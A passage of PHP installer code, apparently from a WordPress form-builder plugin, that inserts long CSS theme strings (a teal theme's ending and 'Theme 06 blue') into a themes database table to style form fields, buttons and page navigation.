table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #CECECE;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #029A95 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #029A95 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #029A95 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #029A95 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #029A95 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #029A95 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #029A95 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 4px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 20px;\r\n	overflow: hidden;\r\n	background: transparent;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n	border: 1px solid #ABAAAA;\r\n	border-radius: 7px;\r\n	color: #4C4C4C;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 25px;\r\n	width: 28px;\r\n	background: url([SITE_ROOT]/images/06/01.png) no-repeat 0% 50%;\r\n	position: absolute;\r\n	top: -1px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 66px;\r\n	height: 49px;\r\n	background: url([SITE_ROOT]/images/06/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page\r\n{\r\n        width:inherit !important;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/06/next.png) no-repeat right #019993;\r\n 	padding: 0px 36px 0 20px ;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	border: 1px solid #018580;\r\n\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/06/next.png) no-repeat right #00C5BD;\r\n}\r\n.previous-page\r\n{\r\n        width:inherit !important;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	border: 1px solid #959595;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #E8E8E8;\r\n}\r\n.previous-page div.wdform-page-button:before {\r\n	content: " ";\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left;\r\n	height: 19px;\r\n	width: 20px;\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	top: -2px;\r\n	position: relative;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: #019993;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #018580;\r\n}\r\n.button-submit:hover {\r\n	background: #00C5BD;\r\n}\r\n.button-reset {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #959595;\r\n	margin-left: 5px;\r\n}\r\n.button-reset:hover {\r\n	background: #E8E8E8;\r\n}\r\n.wdform_page {\r\n	background: #B1EBE9;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: #029A95;\r\n	color: #ffffff !important;\r\n	font-size: 16px;\r\n	text-align: left;\r\npadding: 7px 30px 10px;\r\n}\r\n\r\n.wdform_section_break2 p{\r\n	color: #ffffff !important;\r\n	\r\n}\r\n\r\n.wdform_section_break2:after {\r\n	content: " " ;\r\n	position: relative;\r\n	width: 16px;\r\n	height: 13px;\r\n	top: -3px;\r\n	left: 1px;\r\n	box-shadow: 0px 7px 2px #c9c9c9;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\n	margin: 16px 10px 16px 0px;\r\ncolor:#4C4C4C;\r\nfont-size: 16px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 5px;\r\n	height: 27px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ABAAAA;\r\nbackground: transparent;\r\ncolor: #5C5C5C;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type="password"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ntextarea {\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type="text"]:focus{\r\n	border: 1px solid #029A95;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border: 1px solid #029A95;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border: 1px solid #029A95;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #029A95;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/06/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 9px 1px rgb(218, 218, 218) inset;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #4C4C4C;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #4C4C4C;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 25px 0px 25px;\r\n	font-weight: bold;\r\n	background-color: #029A95;\r\n	margin-right: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #00DAD3;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 20px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 25px 0px 25px;\r\n	margin-right: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	vertical-align: middle;\r\n	background: #01B3AD ;\r\n	background: -moz-linear-gradient(left, #01B3AD 0%, #01CDC6 39%, #02DED6 100%);\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #01B3AD ), color-stop(39%, #01CDC6 ), color-stop(100%, #02DED6 ));\r\n	background: -webkit-linear-gradient(left, #01B3AD 0%, #01CDC6 39%, #02DED6 100%);\r\n	background: -o-linear-gradient(left, #01B3AD 0%, #01CDC6 39%, #02DED6 100%);\r\n	background: -ms-linear-gradient(left, #01B3AD 0%, #01CDC6 39%, #02DED6 100%);\r\nlinear-gradient(to right, #01B3AD 0%, #01CDC6 39%, #02DED6 100%)\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\n	background-color: #029A95;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: left !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #ffffff;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #ffffff;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 23px;\r\n	height: 23px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\r\n\r\n.wdform-section-break-div\r\n{\r\nborder-top:1px solid #ABAAAA !important;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 06 blue\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #BBDBE7;\r\nborder: 1px solid #25A5DF;\r\nmargin-bottom: 10px;\r\ncolor: #25A5DF;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: transparent !important;\r\n	margin: 7px 0px;\r\nborder:1px solid #ABAAAA !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #CECECE;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #0176AA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #0176AA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #0176AA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #0176AA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #0176AA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #0176AA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #0176AA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 4px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 20px;\r\n	overflow: hidden;\r\n	background: transparent;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n	border: 1px solid #ABAAAA;\r\n	border-radius: 7px;\r\n	color: #4C4C4C;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 25px;\r\n	width: 28px;\r\n	background: url([SITE_ROOT]/images/06/01.png) no-repeat 0% 50%;\r\n	position: absolute;\r\n	top: -1px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 66px;\r\n	height: 49px;\r\n	background: url([SITE_ROOT]/images/06/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\nbackground: url([SITE_ROOT]/images/06/next.png) no-repeat right #0D66B1;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\nborder: 1px solid #107DAF;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\nbackground: url([SITE_ROOT]/images/06/next.png) no-repeat right #25A5DF;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	border: 1px solid #959595;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #E8E8E8;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: #0D66B1;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #107DAF;\r\n}\r\n.button-submit:hover {\r\n	background: #25A5DF;\r\n}\r\n.button-reset {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #959595;\r\n	margin-left: 5px;\r\n}\r\n.button-reset:hover {\r\n	background: #E8E8E8;\r\n}\r\n.wdform_page {\r\n	background: #BBDBE7;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: #0D66B1;\r\n	color: #ffffff;\r\n	font-size: 16px;\r\n	text-align: left;\r\npadding: 7px 30px 10px;\r\n}\r\n\r\n.wdform_section_break2:after {\r\n	content: " " ;\r\n	position: relative;\r\n	width: 